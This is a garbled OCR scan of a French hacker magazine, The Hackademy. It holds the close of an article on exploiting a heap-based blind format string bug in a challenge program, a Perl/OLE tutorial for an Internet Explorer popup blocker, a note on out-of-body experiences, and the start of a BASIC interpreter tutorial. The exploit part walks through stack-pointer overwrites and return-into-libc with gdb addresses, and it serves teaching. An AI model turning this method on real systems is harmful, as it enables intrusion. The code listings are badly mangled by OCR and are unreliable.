lorsque les contraintes sont plus 
fortes : pile et tas non 
exécutables, environnement et 
arguments inutilisables, etc. Avis 
aux amateurs ! 


at 


Pour ce deuxième exemple, nous 
allons étudier le programme vuln2 du 
HRChallenge de Sauron (qui n'est 
plus en ligne, malheureusement). Voir 
ci-contre le code du programme vul- 
nérable. 


A 
* Hrchällenge vuin n° 2 


=== heapfmtz.c 


%* It is a blind format string, heap based. 
## Must work on stack/heap non-exec 1 


*/ 

#include <stdio.h> 

#include <string.h> 

extern char ** environ; 

cher buf[1024]; 

void vuin(char * str)£ 
snprintf(buf, 1924, str); 


void truc(char * str){ 
vuln(str); 

} 

Ant main(int ac, char **av){ 
char *buf; 


int 1, j; 
if (ac != 2) 
return (9); 


bur = strduptavl 11); 
for (1 =D; À < ac; 1H) 


for (= 9; av[ilLil; avLi ITS] = 


for (i = 9; environ[i]; i#+) 


for (j =; environ[i[i]; environ[i]Li##] = 4); 


truc(buf); 
return (0); 


La première différence par 
rapport au programme vulnéra- 
ble de l'article précédent, c'est 
que l'on ne peut plus utiliser 
l'environnement, ni les argu- 
ments pour passer le shellcode à 
l'exploit, En fait, le seul élément 
réellement maîtrisable est la 
chaîne de format elle même. 
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Cependant si l'on y met le 
shellcode, la chaîne de format 
étant dans Le tas, il va nous fal- 
loir récrire plus de 2 octets sur 
la pile. En effet, dans l'exemple 
précédent, on n'écrivait que les 
octets de poids faible car les 2 
octets de poids fort avaient déjà 
la valeur dont nous avions besoin 
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(0xbfff). Les adresses se situant dans 
le tas sont généralement de la forme 
0x0804XXXX sous Linux. 


en 


Adresse de la chaîne de format 


Jusqu'ici, on utilisait les 
pointeurs de frame, car ils 
avaient la propriété de pointer 


les uns sur les autres. 
Dans cet exemple, on 
n'a pas assez de poin- 
teurs de frame pour 
générer les deux poin- 
teurs dont on a besoin. 
On va donc devoir uti- 
liser autre chose. Il 
nous faut trouver 
quelque chose qui a la 
même propriété que 
les pointeurs de frame, 
dans le sens où l'on 
doit avoir quelque 
chose se trouvant dans 
la pile et un pointeur 
sur ce quelque chose 
situé aussi dans la pile, 
tout cela accessible par la chai- 
ne de format, évidemment, On 
va utiliser un pointeur sur 
argv[0] qui se trouve dans le 
bas de la pile. Nous aurons 
donc besoin ici des adresses 
des frames A et B, de arav[0], 
d'un pointeur sur argv{0], ainsi 
que celle de la chaîne de for- 
mat. 

Voyons comment va se 
dérouler l'exploitation pas à 
pas, Comme tout à l'heure, la 
figure 1 représente l'état de la 
pile avant la conversion de la 
chaîne de format. On va poper 
les valeurs de la pile jusqu'à 
arriver à la frame A que l'on va 
utiliser pour faire pointer la 
frame B sur la frame A (Fig. 2). 
Ensuite, on va poper les 
valeurs de la pile jusqu'à arri- 
ver à la frame B, qui pointe sur 
les bits de poids faible de la 
frame À, pour écrire les 2 
octets de poids faible de notre 
payload (Fig. 3). ILnous reste à 
utiliser argv{0] et son pointeur 
pour écrire les 2 octets de 
poids fort. Pour cela, on pope 
les valeurs de la pile jusqu'à 


Breakpaint 1, 
arriver à l'adresse d'argv[0] et 
on fait pointer argv{[0] sur le 
MSB de la frame À (ses 2 
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Adresse de la chaîne de format 


Figure 3 


octets de poids fort, Fig. 4). Et enfin, 
on pope jusqu'à argv[0] et on l'utilise 
pour écrire les 2 octets de poids fort 
de notre payload à l'endroit où l'on 
avait les octets de poids fort de la 
frame A. 

On aurait pu directement écraser 
un saved eip et jumper sur un 
shellcode qu'on aurait mis au début de 
la chaîne de format, mais tout cela doit 
fonctionner sur un système avec pile 
et tas non exécutables (souvenez-vous 
du "Must work on stack/heap non- 
exec !"). On va donc exploiter le 
programme vulnérable en return-into- 
libc, en utilisant la technique bien 
connue de l'espdifting (si cette 
technique vous est inconnue, référez- 
vous à l'article de gangstuck dans 
"The Hackademy Manuel #5") 
Nous devrons donc récupérer en plus 
de nombreuses autres adresses spéci- 
fiques au programme vulnérable et au 
système cible, dont notamment des 
adresses de fonctions. 

Comme dans l'exemple précédent, on 
va utiliser un "faux exploit", Pour récu- 
pérer l'adresse du premier argument (ie. 
argv{0)), on va mettre un breakpoint sur 
une instruction qui suit la création de la 
frame de la fonction main. 


Gx08M484c? in main (ac=?, av=Hxbffffb54) 


L'adresse de argy[0] est donc 
Oxbffffb54 =). On place ensuite un 


breakpoint après l'appel à snprintf. 


Fig 


Un format bug plus vicieux 


Figure 4 


NULL 


DRE 
RE ET) 


en 
eo | 
[NULL trame 


LSB(Frame A) 


STACK 


OxbPITEET 


NULL (Frame C) 


Adresse de la chaîne de format 


Une fois le programme stoppé à 
nouveau, on récupère les adresses de 
frames : 


Cgdb) 1nfo frame 
Stack level 8, frame at Sxbffffaoc: 


eip = 8xB84849c in vuln (heapfnt2.c:14); saved eip GxB04B4b6 


called by frame at Bxbffffabc 
source language c. 


Arglist at Dxbffffagc, args: str-Ox8049c08 ‘A' <repeats 299 times»... 


C1 


La frame À est donc à l'adresse 
Oxbffffa9c. La frame B sur laquelle elle 
pointe est en Oxbffffabc. Et on note au 
passage l'adresse de la chaîne de for- 
mat : Ox8049c08. 

Il nous rest 


trouver un pointeur 


sur argv{0], que l'on trouve facilement 

en farfouillant dans la pile. 
Maintenant que l'on a toutes 

les informations nécessaires, à vous 


d'écrire le code de l'exploit ;). La solu- 
tion sera donnée dans un prochain arti- 
cle dans lequel on décrira une 
technique d'exploitation similaire à 
celle que nous venons d'étudier mais 
dans laquelle on fait boucler le pro- 
gramme vulnérable afin de pouvoir 
utiliser plusieurs fois le même bug de 
chaîne de format. 

ezekiel 


Préinscriptions et infos 
sur thehackademy.net 
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BY L'ABBÉ 


Programmation 
OLE en Perl 


Nous avons effleuré le sujet des 
serveurs OLE de Windows dans le 
dernier TH]. Nous allons ici 
développer davantage et 
programmer un bloqueur de 
popups pour Internet Explorer, à 
titre d'exemple. Vous pourrez voir 
que les possibilités de 
sécurisation, avec un script Perl, 
sont immenses. 


LA [ Newore | 


h | 3 Remote Puffer Overflow Vulnerabiliies in Real RTSP 


Téléchargez 
Active Perl 


Active Perl est disponible sur 
ilips//wnwactivestate.com/. 


Si nous n'avions que survolé le 
sujet, nous allons ici réellement le trai- 
ter, Cependant, mème si ces deux arti- 
cles sont indépendants, je vous invite 
à lire ou à relire l'article du TH] pour 
les points de base que je ne redéfini- 
rai pas. 

Nous allons mettre en place une 
application pour filtrer les actions d'In- 
ternet Explorer. Nous allons créer un 
" popup blocker " et loguer tout ce qui 
a été ou doit être téléchargé par IE lors 
de la consultation d'une page web. 
Pour cela, nous allons lancer IE via 
notre programme afin de permettre un 
contrôle total sur l'application. 

Le but de notre script sera donc de 
s'interfacer avec IE, ce pour ne pas lui 
laisser faire tout et n'importe quoi, et 
surtout pour ne pas laisser un web- 


3. Multiple Vulerebiitiec in HP Web JetAdimin (Read, Write, 


Steames 
7 E]| 4 smtp Insecure File Creation 
a 5. phpBB IP Spoofing Vulnerabiliy 


re de naviq 


cute, Path Disclosure, Passivord Decryption 
4. Microsoft Explorer cer Li are M: 


ocine MOT Aatase-titier 


ni xi 


slow te join | Thehackadems rt 
Sing let 
IF Déactveries popups 


ur mailina 


2. Windows Lsasrv. dl Ré 
3. HSFTP Format String! 
: 4, Metasploï: Microsoft 1] 
nt 


Senerpt it | Security Hole & Expleits Are 


access 


IF. Demander avant d'éuvi uns conneson 


FM] sratus Domonérannrreeut 
Voulez vous authorser la connexion à hitp://hehackademy net} ? 
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Programmation OLE en Perl 


plications de Microsoft 


master peu scrupuleux se servir 
des faiblesses d'IE. 

Voir l'encadré pour la struc- 
ture du programme 


Morphologie du programme 


Le programme (ic_fiker.pl) va être organisé en trois 
morceaux : 

“un module pour 
(THJ:patssOptions), 
-un module pour afficher les boîtes de dialogue 

vec l'utilisateur (THU:Win22::Dialog), 


parser les options 


-le programme en lui-même. 

- le programme principal sera, lui, organisé selon 
ce modèle : 

- une boucle d'événement principale, 

- six fonctions qui vont nous permettre de naviguer: 
sur le Web et de gérer les différents événements |E. 


use warnings; 


THJ:parseOptions possède 
en tout et pour tout deux 
fonctions : parseOpts() et strip(). 


Comme son nom l'indique, 
parseOpts est la fonction qui va 
parser la ligne de commande. Un 
module existe sur le CPAN 
{Getopt:Long), mais j'en ai codé 
un nouveau pour le cêté didac- 
| vique. L'avantage (ou l'inconvé- 
| nient) majeur de ce module par 
rapport à ceux de Getopt::* est 
qu'il est extrêmement libre : pas 
besoin de déclarer d'options à 
parser : parseOptions parse tous 
les arguments et renvoie une 
table de hashage dont les clés 
sont les options et Les valeurs des 
arguments passés à ces options. 
Voici un exemple d'utilisation 


#lc:\perl\bin\per] 


use strict; 

L- Un peu de code useTHU: :parseOptions qw( parseOpts ): 

Paramètres de la ligne de | my %options = parsetpts(); 
commande foreach my Sarg (keys(%options)){ 

print $arg'; 

Le module THJ:parseOptions if Goptions{sarg}) 4 
est procédurale. C'est-à-dire qu'il print " : ‘options(arg}'\n"; 
n'y a pas d'interface objet, ce qui } 
va donner un peu de répit aux | else { 
gens qui ne connaissent pas l'o- print " (vide)\n"; 
rienté objet, car la programma- a 
tion avec Win32:OLE est |} 
entièrement objet. 

Ce module n'exporte aucune | Ce qui donne à l'exécution : 


fonction par défaut, non pas 
parce que le nombre de fonctions 
présentes dans le module est 
d'un ordre propre à alourdir le 


valide. perl 


Erreur! Référence de lien hypertexte non 


testopts.pl -a tutu -b -test=toto 


-tutu raaa -test=titi 


programme appelant, c'est juste | <> test : toto;titi 
pour donner de bons réflexes à | <> à : tutu 

ceux désireux de coder des | <> b (vide) 
modules Perl par la suite. <= tutu : raaa 
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Comme vous pouvez le cons- 
tater, toutes les options ont été 
parsées avec succès. Par exem- 
æle l'option " test ", qui prend 
plusieurs arguments, se voit 
affecter une chaîne de caractè- 
res concaténant toutes les 
options, La syntaxe des options 
elle même est aussi relativement 
libre : le nombre de " - "n'a 
aucune importance, du moment 
qu'il y en a au moins un devant 
les options, vous pouvez passer 
des arguments aux options soit 
en mettant un espace soit en 
mettant un "=". 

Finalement, le seul réel 
inconvénient de ce module est 
que vous êtes obligé de traiter 
vous même les options passées à 
votre script. 

Je ne m'attarderai pas plus 
longtemps sur ce module. Si le 
cœur vous en dit, n'hésitez pas à 
aller voir la fonction de parsing 
et à l'améliorer. 


IL- Beaucoup de code 
Boîtes de dialogue 


Le programme principal, 
outre THJ:parseOptions, va uti- 
liser plusieurs modules. Le pre- 
mier que nous allons voir est 
Win32, qui va nous servir à avoir 
une interface minimum avec l' 
tilisateur, En effet, ie filter.pl 
n'est qu'un code en mode conso- 
le, que nous allons faire tourner 
un peu comme un démon : on le 
lance une fois et on ne s'en occu- 
pe plus. Cependant, il peut y 
avoir des événements qui néce 
sitent une intervention de l'ui 
lisateur par l'intermédiaire 
d'une boîte de dialogue. Pour 
cela, nous allons utiliser les 
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facilités que nous offre Win32, plus 
précisément Win32:MsgBox. pour 
créer une interface de base. Dans 
notre cas particulier, nous allons pas- 
ser par le module que je vous ai pré- 
paré (THJ::Win32::Dialog) pour créer 
ces fenêtres de manière simple et uni- 
forme. Ce module contient plusieurs 
fonctions, que je vous laisse découvrir 
par vous même (les modules sont livrés 
avec la doc ;) les sont toutes cons- | 
truites de la même façon. Prenons 
l'exemple de la fonction msg_yn() : 


sub nsa yn { 
my (msg) =@ ; 
my $ret = Mind2::MsgBox( $nsg ,4, "ie filter dialog"}; 
return 1 if ($ret — 6); 
return undef; 


Ce code est simplissime : on passe 
le texte à afficher en argument, on 
récupère le code renvoyé par 
Win32:MsgBox(), puis on renvoie 1 si 
le code correspond à La validation de 
la fonction (ici si l'utilisateur clic sur 
Yes), sinon undef. 

Pour plus d'information sur les dif- 
férents codes de retour utilisés, je vous 
invite à taper de vos petits doigts agi- 
les " perldoc Win32 ". 


* On a choisi une convention pour les 
codes de retours. En effet, les fonctions 
renvoient toujours 1 pour la confirma 
tion de la boîte, et undef pour l'ini 
mation. Il est ainsi possible de faire 
des traitements de ce type : 


my $IE = undef ; 
sub retry { 
À F Cmsg_rc('mpossible d'atisinare un objet * 
L'IntemetEplorer Actif. Réésayer 3°)) { 
SIE = Wing: :0LE- 
>SethctiveObject(‘IntemetExplorer.Application!} 
or &retry; 
Jelse{ 
info (impossible d'atteindre un objet Intemet" 
‘explorer actif. Création d'un nouvel objet"): 


$1E = Win32: :0LE->newl 'InternetExplorer.Application', “Quit" ) 
or alerta("mpossible de créer une nouvelle instance d'il"); 


ÿ 

} 

$IE = Win2: :0LE->GetActive0bject('InternetExplorer. Application) 
or kretry ; 
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Dans ce code, tant que 
GetActiveObject ne retourne 
rien de satisfaisant et que l'uti- 
lisateur ne clique pas sur Can- 
cel, on essaye encore, 

Après cet amuse bouche, 
nous allons passer aux choses 
sérieuses, c'est-à-dire au détail 
du code que nous allons utiliser 


peu de lignes : 


# Crée la nouvelle fenêtre. 
ny Smain = new HatnMindout ); 


# Taille et titre de la fenêtre. 
Smain -> geonetry('800x186 "); 


# Ajoute un champ texte. 


# La boucle d'événements principale. 
NaïnLoop ; 
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Interface principale 

Tout d'abord, la forme : ie_fil- 
terpl est en fait une barre de 
navigation Tk dans laquelle on 
retrouve un champ permettant 
d'entrer les URLs à visiter, un 
bouton GO et quelques gadgets 
comme par exemple " bloquer 
les popups " (voir la capture 
d'écran). 


L'interface Tk est des plus minimaliste et elle tient en très 


Smain -> title('Barre de navigation ie_filter'); 


$pop_nsg = $main -> Label(-text => " Désactiver les popups "); 
# Case à cocher pour valider le blocage des popups. 
Spop_chk = #main->Checkbutton(-variable = \$popup, onvalue 1); 


# [I Je passe les répétitions de code inutiles à cet article. 
# Pour plus de détails, je vous invite à lire le code source. 


# Les deux lignes suhantes permettent de placer les Items. 
$pop_nsg->place(-x = 48, -y = 40); 
$pop_chk->place(-x = 18, -y = 42); 


Je ne m'étendrai pas plus sur 
l'interface Tk : je vous renvoie à 
l'abondante documentation du 
Net pour plus d'informations (et 
en particulier à la perdoc). 


Utilisation d'OLE 


Voyons maintenant comment 
instancier un objet OLE comme 
Internet Explorer. Mais avant 
cela, je voudrais mentionner un 
détail qui pourrait aider les 
coders (et pas seulement les Perl 
coders) : la distribution ActivePerl 
pour Windows est livrée avec le 
OLE Browser qui permet de retro- 
uver un peu ses billes parmi la 
foule d'objets OLE (attention, 
vous devez utiliser LE pour qu'il 
fonctionne, voir photo d'écran). 
Vous pourrez ainsi voir que les 


possibilités d'applications sont assez vastes (et c'est particu- 
Hièrement vrai pour les applications concernant la sécurité). 
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Revenons à nos moutons. Pour instancier un serveur OLE, 
nous cherchans d'abord s'il en existe déjà un de lancé. Le 
cas échéant, nous essayons de nous l'approprier via la 
méthode GetActiveObject() (catte méthode n'est pas très 
fiable) : 

SIE = Min32: :0LE->GetActi vetbject( ‘InternetExplorer Application"); 

L'étape suivante est de tester si cette opération a réus- 
si, comme on l'a fait plus haut dans l'exemple de msg_re. 
En cas d'échec, on crée une instance avec OLE->new(). 

Cette méthode peut être appelée de plusieurs façons : 
Win32: :OLE->neu(PROGRAMME 1D) ; 

Min32: :OLE->newC PROGRAMME ID, DESTRUCTEUR) ; 
Win32: :OLE->newCMACHINE, PROGRAMME ID) ; 

La première et plus simple des façons consiste à simple- 

ment appeler le constructeur avec comme paramètre le pro- 
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Programmation OLE en Perl 


gramme id (dans notre cas " InternetExplorer.Application "). 
Le destructeur peut être une référence de code ou une chai- 
ne de caractères. La troisième et dernière méthode est la 
version DCOM de la chose, qui fonctionne à distance. Dans 
ce cas, le programme est lancé sur la machine donnée. 

Une fois notre objet IE instancié, il nous faut lui HE 
cher une routine de gestion d'événements : 
Win32::0LE->ithEvents (STE, \aEventRoutine, ‘DebBromserEvents2' 5 

Cette méthode permet d'activer ou de désactiver la ges- 
tion des événements. Dans notre cas, nous voulons par 
‘exemple connaître (et enrayer) les événements qui contrô- 
lent l'émergence des popups. Nous appelons donc WithE- 
vents(), avec comme premier argument notre instance d'IE. 
De cette façon, Win32:0LE sait qu'il n'a pas à gérer les 
événements : c'est la routine EventRoutine() (second argu- 
ment) qui va s'en charger. Pour éviter toute confusion, nous 
ne laissons pas Win32::0LE (toujours en version ALPHA 
pour la gestion d'événements) se charger de déterminer la 
bonne interface (troisième argument) pour notre instance. 

Enfin, après toutes ces initialisations, nous envoyons IE 
sur la page d'accueil : $TF->lavigate( SHomePage ); 

Navigate() est une méthode exportée par IE en tant que 
serveur OLE. 

Après la partie Tk, vous pourrez voir dans la source les 
différentes fonctions qui vont nous servir à naviguer dans 
les méandres OLHien. 

La première d'entre elles porte le doux nom de SML, 
qui n'est autre que l'abréviation de la méthode OLE Spin- 
MessageLoop(). 
sub SHL 
{ 

myC $0bject ) = 
while S0bject-»SpinMassageLoop() ){} 
} 


Cette fonction prend un objet OLE en argument et lance 
dessus la procédure SpinMessagel.oop(), qui cherche tous 
les messages en attente pour une application donnée. Avec 
ce code, nous attendons donc que tous les messages affé- 
rents à notre objet OLE soient dispatchés. 

Vient ensuite EventRoutine() qui prend les bonnes déci- 
sions en fonction des événements reçus. 
sub EventRoutine 
{ 

myC übj, $Event, @Args ) = @. 


1f CHEvent eq ‘Newindow2' && $popup = 1) { 
# Sile flag $oopup est à 1, nous bloquons les popups . 
Sstatus = "STATUS : Block POP-UP"; 
Sargs[1]->Put(1); 

ÿ 


elsif C "Beforellavigate2" eq $Event ) { 
Tacal( $Ur1, $Message ); 
$Ur1 = 1e fArgs[1]->alue(); #ôn récupère 1'URL 
print ‘-> Beforelavigatez : URL = $UrI\n"; 
# On change le statut, puïs on demande à l'utilisateur 
# s'il accepte la connexion (sous réserve d'avoir actwé 
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# l'option * Demander avant d'ouvrir une connexion "} 
$status = "STATUS : Downloading $Url"; 
Àf Csaskconn = 1) { 
unless msg yn(" Voulez-vous autoriser le conrexion 
à sun? !) { 
“print “An\nLAST IND : ##rgs\nin,join ‘ 3; 
! ,@Args "Ann"; 
aierte(" Connexion abandonnée "}; 
ShrgsC6]->Put( 1 ); 
S0bj->stop(); 
à 


} 
} 


elsif ($Event eq 'onQuit') { 
# On quitte proprement sl l'utilisateur ferme sauvagement 
IE au lieu de l'application 
# (Jai toujours le dern'er mot :) 
quitO); 
} 


# Pour tous les autres événements, on affiche sur la console. 
else { 
print "evenement : SEvent\n"1f($Event ne 
'StatusTextChange!); 
} 
} 

Notez que les événements sont tirés du OLE Browser 
section Microsoft Internet Controls -> Internet Explorer. 
Viennent ensuite les fonctions navig(), goBack() et goNext() 
qui sont les fonctions de navigation proprement dites. 

nevig() est appelée lorsque l'utilisateur clique sur GO 
(dans ie_filter). L'URL qui apparaît à ce moment dans la 
‘barre d'adresse (Tk) est passée à IE qui l'affiche. 
sub névig { 

push Ghistony, $HonePage; 

$IE->Navigate("SomePage") ; 

Shist_idx = Sfhistory; 

$status = "STATUS : Uownloading $homePage"; 

Smain -> title("Barre de navigation de filter [ SHomePage 1"); 
) 

Cette fonction possède deux particularités : elle utilise 
Navigate2 et elle crée un historique. 

NavigiteZ () fait tout comme Navigate(), mais elle per- 
met en plus de naviguer parmi les PIDLs (ça doit être inté- 
ressant non ?). 

Plus intéressant, cette fonction met à jour un historique 
propre au script. Cela a pour but de ne garder dans l'his- 
torique que les URLs qui ont été explicitement demandées 
ou autorisées par l'utilisateur dans ie_ filter, Ceci, combiné 
à l'anti popup, devrait empêcher pas mal d'accidents. 

Les fonctions goBack() et golext() permettent la navi- 
gation dans l'historique. 
sub goBack 

#hist_idx--; 
SIE->NivigateZ("$history{Shist_ide]"); 
HHomePage = $history[Shist_idx 
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#nain -> Litie("Barre de navigation 1e filter L SHomePage ]'); 
} 


subgoNext { 
Shise ide; j 
$1E->#avigete2("shistoryLShist Adx7") 

if Cdefined(fhistorylShist_i6x])); 

SHonePage = $historÿCShist_dx] ; 
Sein -> titlel"Barre de navigetion ie filer [ SHonePage 1°); 
} 

Le code source complet est disponible sur le site the- 
hackademy.net (voir l'encadré pour les détails). 

Bien entendu, dans cet article je n'ai traité qu'un mini 
muni la chose, car le nombre d'événements qu'il est pos 
ble de prendre en compte est assez important pour faire 
une application intéressante, Cependant, il est nécessaire 
de faire très attention à la façon dont on code, car une appli: 
cation " tampon " comme ie_filter.pl peut vite devenir très 
lourde, et particulièrement quand on passe par Win32:OLE. 


Conclusion 

Perl présente de nombreux avantages et le fait de pou- 
voir s'interfacer avec des applications Windows du type ser. 
veurs OLE ne le rend que plus intéressant. De plus, il y a un 
gain réel dans le fonctionnement de certaines applications 
Windows. Par exemple on pourrait imaginer utiliser la puis- 
sance de Perl dans le domaine de l'analyse des chaînes de 
caractères pour parser les pages HTML visionnées à l'aide 
d'IE, afin de vérifier que ne sé cache aucun code hostile dans 
ces pages (et en interdire l'affichage si tel est le cas). On 
pourrait aussi faire des merveilles avec Outlook en effec- 
tuant des tests sur Lout ce qui est prêt a être visionné, afin 
d'éviter des contaminations intempestives, Pourquoi pas, non 
lus, vérifier les contacts MSN ? Les possibilités sont assez 
importantes. Je vous conseille vraiment de mettre le nez 
dans l'OLE Browser ! Si la programmation Windows vous 
intéresse, cela ne devrait pas vous laisser indifférent. 

Ceci dit, afin de remédier définitivement aux problè- 
mes récurrents liés à LE et Outlook, je vous conseillerais 
de passer à Mozilla :). 


Archive à télécharger 

Vous trouverez dans l'athive d'iefiter (disponible sur 
fesdhackthehackademynet) Un répertoire lbs/ contenant les deux 
moduies THUrarseOptiars0.1'etTHIWn32DialosO 1, au format CPAN. 
Le module parseOptions est générique et peut étre installé sur 
n'importe quel OS (sous UNIX : ‘perl Makeñile.PL && make && 
make test && make install). L'autre est spécifique à Windows et 
nécessite le module Win32 (installé par défaut avec ActivePerl). 
La méthode standard d'installation n& fonctionne pas sous Win- 
dows (sauf si \ous possédez Cygwin);iLy a cependant une pos- 
sibilité : télécharger nmake sur le site de Microsoft. Pour ceux 
qui ont la flemme de faire tout cela, créez un répertoire THJidans. 
le répertoire d'installation de Perl contenant les [lbs (par défaut. 
:\perl\lb\) et copiez le fichier parscOptions. pm. Puis créez un 
répertoire Win32 et copiez dedans le fichier Dialog.pm. 
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Des chercheurs suisses ont découvert qu’en stimulant une partie du cerveau appelée gyrus angu- 

laire droit on pouvait donner l’illusion à un sujet de flotter au dessus de son corps. Ce qui donne 

une explication rationnelle aux OBE (Out-of-Body Experiences) souvent relatées par les gens qui 

ont cru mourir et revenir à la vie (Near Death Experiences), C’est donc un dysfonctionnement de 

cette zone qui serait à l’origine de telles sensations. Le gyrus angulaire pourrait être un nœud 
crucial dans un circuit responsable de l'intégration des données sensorielles et de la production! 
d’une image de son propre corps. 

Ces chercheurs ne sont pas les premiers à faire un lien entre une excitation électrique du cerveau 

et les expériences extra-corporelles, Depuis 1995 le psychologue Michael Persinger suscite des 
sensations paranormales (comme d’être environné de gens invisibles), par la stimulation le 
trique de différentes régions du cerveau. 

Privé des références fondamentales grâce auxquelles il se reconnaît en permanence, le corps 
renvoie de lui-même une image incertaine qui conduit momentanément le sujet à douter de 

son appartenance à ce même corps, 


Pdf 


Tandis que le système nerveux central commande les actions réflexes ou intentionnelles des 
muscles, ces derniers lui adressent, en retour, des informations sur ces actions. Les muscles 
renseignent le cerveau sur nos postures et nos mouvements grâce à des formations nommées 
fuseaux neuromusculaires qui contiennent des capteurs sensibles à la longueur et à la varia- 
tion de longueur des muscles. Ces corps cellulaires sont reliés à de nombreuses structures 
cellulaires centrales, tells que la moelle épinière, le cervelet et les régions pariétales de l’é- 
corce cérébrale. Les informations issues des fuseaux neuromusculaires sont utilisées pour la 
gestion de la motricité reflexe ou intentionnelle, ou pour l’élaboration de la connaissance des 
activités du corps et de ses rapports avec l’environnement. 
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Création 
d'un langage 


Nous apprenions dans le dernier 
numéro que que le système 
d'exploitation du CPCNG sera 
piloté par le NGBASIC, un langage 
de programmation inspiré du CPC 
original, Comment conçoit-on un 
tel langage ? C'est ce que nous 
allons voir. 


ses LNewore | 


Le BASIC fut inventé en 1965 
au Dartmouth College, aux 
Etats-Unis, par Thomas E. Kurtz 
et John G. Kemeny. II était initia- 
lement destiné à faciliter 
l'apprentissage de la program: 
mation aux étudiants, Son nom 
l'indique : BASIC signifie 
‘Beginners All purpose Symbo- 
lic Instruction Code" (code d’ins- 
tructions symbolique universel 
destiné aux étudiants), Mis au 
point à une époque où les micro- 
ordinateurs n’existaient pas, il a 
été adapté à ces derniers en 
1974 par Bill Gates et Paul 
Allen, les fondateurs de Micro- 
soft. Celui de l'Amstrad, très 
performant, complet et rapide, 
fut l’œuvre de la petite société 
Locomotive Software Ltd, et 
notamment du désormais 
mythique Richard Clayton… 


Présentation 


Le NGBASIC sera une nou- 
velle version du BASIC, proche 
de celui du CPC classique mais 
avec de nouvelles commandes, 
histoire de l'adapter aux besoins 
actuels. Pour des raisons de faci- 
lité, nous allons le développer en 
‘TML2, le langage dans lequel 
notre système d'exploitation 
sera codé, Éventuellement, par 
la suite, quelqu'un pourra le 
transposer en langage assem- 
bleur afin de le rendre plus rapi- 
de et compact. 
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Notre interpréteur prend en 
entrée une suite de lignes et exé- 
cute l'action associée à chacune 
d'elles. 


Les valeurs 


Pour l'instant, nous distin- 
guons les valeurs entières et les 
valeurs booléennes. Il nous faut 
donc définir, en langage TML2 
(qui a une syntaxe proche du 
Pascal), les types de données sui- 
vants : 


Type 
basiclype = (Int, Bool) ; 
basicData = 
Record 
Case flag : bastcType of 
Int : (Val : integer) ; 
8001 : (bal : boolean) 
End ; 
value = ‘bastcData ; 


À travers Basiclype, on 
donne la liste des types de 
valeurs qui sont manipulées par 
NGBasic. Les valeurs entières et 
booléennes de NGBasic sont 
représentées par leur équivalent 
en TML2 (integer et boolean). 

Le type Value est un pointeur. 
Sa valeur pourra être retournée 
comme le résultat d’une fonction. 


Une valeur NGBasic est créée 
à partir d’un entier ou booléen 
TML2 via l’une des fonctions 
suivantes : 


CPCNG 


Function newint(n : 
Var aux 
Begin 
nenQaUX) à 
aux". flag 
aux". iVal 
nenlnt := aux ; 
End ; 


integer) : 
: value ; 


value : 


Int ; 
=n: 


Function newBool(b : boolean ) : value ; 

Var aux 

Begin 
new(aux) ; 


: value ; 


Nous devons penser à des évolutions 
ultérieures : nous définissons donc une 
valeur particulière "qui n'existe pas" 
et l’appelons NoValue, que nous défi- 
nissons par le pointeur Nul (puisque les 
valeurs sont des pointeurs). 


Const 


NoValue = Nil ; 


Comment accéder aux composants 
d'une valeur NGBasic ? 


Les composants d'une valeur sont 
accessibles au moyen de l'une des trois 
fonctions suivantes : 


Function typeOf(v : velue) + basicType ; 


Begin 
tspeof := v*.f1ag ; 
End ; 
Function iValDf(y : value) : integer ; 
Begin 
AValof += VA. Val ; 
End ; 


Function bValDf(y : value) : booïean ; 
Begin 

bValof := v*.bVal ; 
End ; 


Pour nous renseigner sur le type 
NGBasic de la valeur représentée par 
l'argument y, nous avons à notre dispo- 
sition la fonction TypeOf. Si la valeur 
de retour est Int, on utilisera iValOf 
comme fonction d'accès aux valeurs 
TML2 correspondantes. Si la valeur de 


retour est Bool, on utilisera bValOf. 

Voilà les informations de base sur 
les valeurs NGBasic. La prochaine fois, 
nous verrons comment écrire une fonc- 
tion qui affiche une valeur. N'hésitez 
pas à vous amuser à chercher la solu- 
tion et envoyez-la sur notre forum, 
nous publierons les meilleures ! 


variant (type expNode) qui contient 
la représentation d'une constante, 
d'une variable, d'une expression 
unaire ou d'une expression binai- 
1e; 

+ les différentes catégories d'expres- 
sions sont discriminées par un champ 
de type expCase. 


Voici les déclarations TML2 correspondantes : 
Type 
‘expOp = (Add, MU, Sub, Dvd, Neg, Conj, Disj, Eq, Lt, Gt) : 
expCase = (Evar, Cste, UnOp, Bin0p) ; 
exp = ‘expllode ; 
expNode = 
Record 
Case flag : expCase of 
Evar : (name : String) ; 
Cste : (val : value) ; 
Un0p_: (opl : expop ; 
arg : exp); 
8in0p : Cop2 : explp : 
argl : exp ; 
arg2 : exp) : 
End ; 
La syntaxe NGBasic Le problème est que pour chaque 
catégorie d'expressions possibles, il 
Notre langage se compose | nous faut définir une fonction de 


d'expressions indiquant des valeurs 
booléennes ou entières. L'ensemble 
des expressions correspond donc à 
l'ensemble des valeurs NGBasic, de 
l'ensemble des variables et des opéra- 
teurs. Donc, si nous résumons : 


1. Les valeurs sont des expressions 
(on les appelle alors constantes). 

2. Les variables sont des expressions. 

3. Si e est un opérateur et si ez et e2 
sont des expressions, alors » ey et 
ee ez sont des expressions (on les 
appelle respectivement expression 
uniar et expression binaire). 


En TML2, Pintégralité des cons- 
tantes est représentée par l’ensemble 
des valeurs du type TML2 value ; les 
variables sont représentées par des 
chaînes de caractères et l’ensemble 
des opérateurs par les types énumé- 
rés «p0p. Pour représenter les arbres 
d'expressions, on utilise la structure 
suivante : 


+ une expression (type exp) est un 
pointeur sur un nœud ; 
«un noeud est un enregistrement 
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construction de l'arbre correspon- 
dant. 


Pour construire une constante 
directement depuis un entier où un 
booléen TMLZ, il nous faut deux cons- 
tructeurs pour les constantes. 


Function nenEvar(x : String) : 
5 exp à 


exp ; 
Var aux 
Begin 
nen(aux) ; 
aux flag 
aux” .name 
névEvar 
End 


Function newCsteA(n : integer) : exp ; 


Var aux : exp; 
Begin 
new(aux) : 
aux flag := Cste ; 
aux val := neulnt(n) ; 
nenCsteA := aux : 
End ; 


Function newCsteB(h : boolean ) : 8xp ; 
Var aux 5 Exp ; 
Begin 
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newÇaux) ; 
aux". flag := Cste ; 
auxf.val := newBonl(b) ; 
nenCsteB := aux ; 
End ; 
Function newUnOp(op : exp0p; € : exp) : exp ; 
Var aux : exp ; 
Begin 
newtaux) ; 
aux”. flag := Un0p ; 
aux*.opl := op ; 
aux.arg e 
newUnOp := aux ; 


End ; 


Function newBinOp(op : exp0p; 81 : exp; 62 : exp) : exp ; 
Var aux : exp; 
Begin 

newQaux) ; 


Begin 


